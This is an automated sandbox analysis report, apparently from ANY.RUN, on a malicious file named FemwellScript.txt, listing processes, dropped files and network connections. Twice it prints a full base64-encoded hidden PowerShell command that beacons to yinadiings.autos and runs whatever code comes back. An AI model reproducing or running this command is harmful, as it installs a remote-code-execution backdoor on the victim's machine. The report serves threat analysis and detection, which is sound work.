File name: | FemwellScript.txt |
Full analysis: | https://app.any.run/tasks/f2f418f5-5190-40fd-96e0-98f5325aff1f |
Verdict: | Malicious activity |
Analysis date: | August 12, 2022, 15:54:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | DF710F15AFC3856AA898E55F12917069 |
SHA1: | C41540E70F3A082511074FCD604687BD0EEE36EE |
SHA256: | 2E921355D8315A3EDA831D32A91EB830C30D6E4FD64D96A4914E2D47B3875C64 |
SSDEEP: | 1536:a2m2SaSyM/psnIBcKAwbTdhfuLuwrsvxrkVZS:C7/psoAwPdhwS |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3572 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\Desktop\FemwellScript.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3008 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2396 | "C:\Windows\regedit.exe" | C:\Windows\regedit.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Editor Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2844 | "C:\Windows\regedit.exe" | C:\Windows\regedit.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Editor Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3164 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3556 | powershell -WindowStyle Hidden -E CgAKAAoAJABhAHMAYwBfAGUAbgBjAF8AVABYAFQAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBkACAAPQAgACQAbgB1AGwAbAA7AAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAUAByAG8AcABGAHIAbwBtAF8AaQBkAHgAKABbAHMAdAByAGkAbgBnAF0AJABBAFIAUgBfAGIAcwAyACkAIAB7AAoACQAkAEEAUgBSAF8AYgBzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQQBSAFIAXwBiAHMAMgApADsACgAKAAkAJABzAHQAPQAkAGEAcwBjAF8AZQBuAGMAXwBUAFgAVAAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABBAFIAUgBfAGIAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABBAFIAUgBfAGIAcwBbADUALgAuACQAQQBSAFIAXwBiAHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQBzAGMAXwBlAG4AYwBfAFQAWABUAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGQAdAApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0ACgAKACQAZAAgAD0AIAAiAHkAaQBuAGEAZABpAGkAbgBnAHMALgBhAHUAdABvAHMAIgA7AAoAJABlAHAAIAA9ACAAIgBXAHkASQAwAE4AegBRADEATgBUAEEAMwBOAFQAVQB5AE4AVABBADQATgBUAE0AMgBOAFQAUQBpAEwARABFADIATgBUAGMAMQBOAFQAVQB3AE0ARABsAGQAIgA7AAoACgAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEAcwBjAF8AZQBuAGMAXwBUAFgAVAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZQBwACkAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9ACAAYwBhAHQAYwBoAHsAfQAKAAoAJAB2ACAAPQAgACIAMAAiADsACgAkAGcAYgByAFAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAGUAdQBiAGUAcgBHAGIAUgBcACIAOwAKAAoAJABpAHMAPQAkAGoAcABbADEAXQA7AAoAJAB1AD0AJABqAHAAWwAwAF0AOwAKAAoAJABsAHYAIAA9ACAAIgAxADQAIgA7AAoACgAkAHMAdABtAFYAYQByACAAPQAgACIAUwBlAGMAdQByAGkAdAB5AFQAYQBzAGsATQBhAG4AYQBnAGUAcgAiADsACgAkAGEAIAA9ACAAJABhAHMAYwBfAGUAbgBjAF8AVABYAFQAOwAKAAoAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAIAB7AAoACQB0AHIAeQAgAHsACgAJAAkAdAByAHkAIAB7AAoACQAJAAkAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGcAYgByAFAAYQB0AGgAKQApACAAewAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABnAGIAcgBQAGEAdABoACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAYgByAFAAYQB0AGgAIAAtAE4AYQBtAGUAIAAkAHMAdABtAFYAYQByADsACgAJAAkACQAJACQAagBkACAAPQAgAGcAZQB0AFAAcgBvAHAARgByAG8AbQBfAGkAZAB4ACgAJAByACkAOwAKAAoACQAJAAkACQAkAHYAIAA9ACAAJABqAGQAWwAwAF0AOwAKAAoACQAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9ACAAZQBsAHMAZQAgAHsACgAJAAkACQAkAHYAIAA9ACAAJABqAGQAWwAwAF0AOwAKAAkACQB9AAoACgAJAAkAdAByAHkAIAB7AAoACQAJAAkAJABkAHQAIAA9ACAAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvACQAZAAvAHgAPwB1AD0AJAB1ACYAaQBzAD0AJABpAHMAJgBsAHYAPQAkAGwAdgAmAHIAdgA9ACQAdgAiACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACgAJAAkACQAkAGoAZAAyACAAPQAgAGcAZQB0AFAAcgBvAHAARgByAG8AbQBfAGkAZAB4ACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAGIAcgBQAGEAdABoACAALQBOAGEAbQBlACAAJABzAHQAbQBWAGEAcgAgAC0AVgBhAGwAdQBlACAAJABkAHQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBTAHQAcgBpAG4AZwAiACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsACgAJAAkACQAJACQAagBkACAAPQAgACQAagBkADIAOwAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AAoACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAGkAZgAgACgAJABlAHgAIAAtAGUAcQAgACQAdAByAHUAZQApACAAewAKAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAHMAdABvAHAAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQBpAGUAeAAgACQAagBkAFsAMQBdADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgAKAAkAdAByAHkAIAB7AAoACQAJACQAcwBsAHMAIAA9ACAAKAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA3ADAAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ADAAKQAqADYAMAApADsACgAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJADoAcwBsACAAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADYANQAgAC0AbQBpAG4AaQBtAHUAbQAgADIANQApADsACgAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAGkAZgAgACgAKAAkAHQAcwAyAC0AJAB0AHMAKQAgAC0AZwB0ACAAJABzAGwAcwApACAAewAKAAkACQAJAAkAYgByAGUAYQBrACAAcwBsADsACgAJAAkACQB9AAoACQAJAH0ACgAJAH0AIABjAGEAdABjAGgAewB9AAoAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3536 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nlbzevye.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 1 Version: 4.0.30319.34209 built by: FX452RTMGDR | ||||
2932 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -E CgAKAAoAJABhAHMAYwBfAGUAbgBjAF8AVABYAFQAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAOwAKACQAagBkACAAPQAgACQAbgB1AGwAbAA7AAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAUAByAG8AcABGAHIAbwBtAF8AaQBkAHgAKABbAHMAdAByAGkAbgBnAF0AJABBAFIAUgBfAGIAcwAyACkAIAB7AAoACQAkAEEAUgBSAF8AYgBzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQQBSAFIAXwBiAHMAMgApADsACgAKAAkAJABzAHQAPQAkAGEAcwBjAF8AZQBuAGMAXwBUAFgAVAAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABBAFIAUgBfAGIAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABBAFIAUgBfAGIAcwBbADUALgAuACQAQQBSAFIAXwBiAHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQBzAGMAXwBlAG4AYwBfAFQAWABUAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGQAdAApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0ACgAKACQAZAAgAD0AIAAiAHkAaQBuAGEAZABpAGkAbgBnAHMALgBhAHUAdABvAHMAIgA7AAoAJABlAHAAIAA9ACAAIgBXAHkASQAwAE4AegBRADEATgBUAEEAMwBOAFQAVQB5AE4AVABBADQATgBUAE0AMgBOAFQAUQBpAEwARABFADIATgBUAGMAMQBOAFQAVQB3AE0ARABsAGQAIgA7AAoACgAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEAcwBjAF8AZQBuAGMAXwBUAFgAVAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZQBwACkAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9ACAAYwBhAHQAYwBoAHsAfQAKAAoAJAB2ACAAPQAgACIAMAAiADsACgAkAGcAYgByAFAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAGUAdQBiAGUAcgBHAGIAUgBcACIAOwAKAAoAJABpAHMAPQAkAGoAcABbADEAXQA7AAoAJAB1AD0AJABqAHAAWwAwAF0AOwAKAAoAJABsAHYAIAA9ACAAIgAxADQAIgA7AAoACgAkAHMAdABtAFYAYQByACAAPQAgACIAUwBlAGMAdQByAGkAdAB5AFQAYQBzAGsATQBhAG4AYQBnAGUAcgAiADsACgAkAGEAIAA9ACAAJABhAHMAYwBfAGUAbgBjAF8AVABYAFQAOwAKAAoAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAIAB7AAoACQB0AHIAeQAgAHsACgAJAAkAdAByAHkAIAB7AAoACQAJAAkAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGcAYgByAFAAYQB0AGgAKQApACAAewAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABnAGIAcgBQAGEAdABoACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAYgByAFAAYQB0AGgAIAAtAE4AYQBtAGUAIAAkAHMAdABtAFYAYQByADsACgAJAAkACQAJACQAagBkACAAPQAgAGcAZQB0AFAAcgBvAHAARgByAG8AbQBfAGkAZAB4ACgAJAByACkAOwAKAAoACQAJAAkACQAkAHYAIAA9ACAAJABqAGQAWwAwAF0AOwAKAAoACQAJAAkACQAkAGUAeAAgAD0AIAAkAHQAcgB1AGUAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAkACQB9ACAAZQBsAHMAZQAgAHsACgAJAAkACQAkAHYAIAA9ACAAJABqAGQAWwAwAF0AOwAKAAkACQB9AAoACgAJAAkAdAByAHkAIAB7AAoACQAJAAkAJABkAHQAIAA9ACAAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvACQAZAAvAHgAPwB1AD0AJAB1ACYAaQBzAD0AJABpAHMAJgBsAHYAPQAkAGwAdgAmAHIAdgA9ACQAdgAiACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AAoACgAJAAkACQAkAGoAZAAyACAAPQAgAGcAZQB0AFAAcgBvAHAARgByAG8AbQBfAGkAZAB4ACgAJABkAHQAKQA7AAoACQAJAAkAaQBmACAAKAAkAGoAZAAyAFsAMABdACAALQBnAHQAIAAkAHYAKQAgAHsACgAJAAkACQAJACQAdgAyACAAPQAgACQAagBkADIAWwAwAF0AOwAKAAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABnAGIAcgBQAGEAdABoACAALQBOAGEAbQBlACAAJABzAHQAbQBWAGEAcgAgAC0AVgBhAGwAdQBlACAAJABkAHQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBTAHQAcgBpAG4AZwAiACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsACgAJAAkACQAJACQAagBkACAAPQAgACQAagBkADIAOwAKAAkACQAJAAkAJABlAHgAIAA9ACAAJAB0AHIAdQBlADsACgAJAAkACQB9AAoACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAGkAZgAgACgAJABlAHgAIAAtAGUAcQAgACQAdAByAHUAZQApACAAewAKAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAHMAdABvAHAAOwAKAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQBpAGUAeAAgACQAagBkAFsAMQBdADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAJAAkAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgAKAAkAdAByAHkAIAB7AAoACQAJACQAcwBsAHMAIAA9ACAAKAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA3ADAAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ADAAKQAqADYAMAApADsACgAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJADoAcwBsACAAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAdAByAHkAewAKAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgACgAZwBlAHQALQByAGEAbgBkAG8AbQAgADYANQAgAC0AbQBpAG4AaQBtAHUAbQAgADIANQApADsACgAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAGkAZgAgACgAKAAkAHQAcwAyAC0AJAB0AHMAKQAgAC0AZwB0ACAAJABzAGwAcwApACAAewAKAAkACQAJAAkAYgByAGUAYQBrACAAcwBsADsACgAJAAkACQB9AAoACQAJAH0ACgAJAH0AIABjAGEAdABjAGgAewB9AAoAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3788 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\jun1ifux.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 1 Version: 4.0.30319.34209 built by: FX452RTMGDR |
PID | Process | Filename | Type | |
---|---|---|---|---|
3556 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | binary | |
MD5:E97790B1D56B9C85BA09F3403728C58B | SHA256:8DB82A80959F0D6101117919575E38D0296C850B5BC63B7CD5A581E7BEE25765 | |||
3008 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFd0f62.TMP | binary | |
MD5:CCFCF369F751CE8DA0370D84E52A7EED | SHA256:53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9 | |||
3556 | powershell.exe | C:\Users\admin\AppData\Local\Temp\CabBF35.tmp | compressed | |
MD5:589C442FC7A0C70DCA927115A700D41E | SHA256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A | |||
3536 | csc.exe | C:\Users\admin\AppData\Local\Temp\nlbzevye.out | text | |
MD5:FE1BAFEEFD658E2799F871E35F9FE7A2 | SHA256:CA133D8C4838C3ABA8B2C3991C559FA0934A9C6083FB934C186CB89A780BF47B | |||
3556 | powershell.exe | C:\Users\admin\AppData\Local\Temp\nlbzevye.0.cs | text | |
MD5:D8122A98931AAFFEA83183DE801C368E | SHA256:04B5F9E4602CA491A9F533CD82F82CF4646C36977092535DC0E9E8AE23DC736B | |||
3008 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2XCQBQNSQ6IVNOR2M1BC.temp | binary | |
MD5:903A96FDD41E6F20344E13F399E94720 | SHA256:4ACBF4AE0A4A7FE64723364A5D311E1D3379B860433CA54F4A2545F41EE7D9E5 | |||
3008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yml0dnui.ncq.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2932 | powershell.exe | C:\Users\admin\AppData\Local\Temp\1u5bs2bb.wzu.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3556 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TarBF36.tmp | cat | |
MD5:7EE994C83F2744D702CBA18693ED1758 | SHA256:5DB917AB6DC8A42A43617850DFBE2C7F26A7F810B229B349E9DD2A2D615671D2 | |||
3556 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed | |
MD5:589C442FC7A0C70DCA927115A700D41E | SHA256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3556 | powershell.exe | GET | 200 | 67.27.234.126:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?aee6a13ac7bdef27 | US | compressed | 60.2 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2932 | powershell.exe | 104.21.64.112:443 | yinadiings.autos | Cloudflare Inc | US | suspicious |
3556 | powershell.exe | 104.21.64.112:443 | yinadiings.autos | Cloudflare Inc | US | suspicious |
3556 | powershell.exe | 67.27.234.126:80 | ctldl.windowsupdate.com | Level 3 Communications, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
yinadiings.autos |
| malicious |
ctldl.windowsupdate.com |
| whitelisted |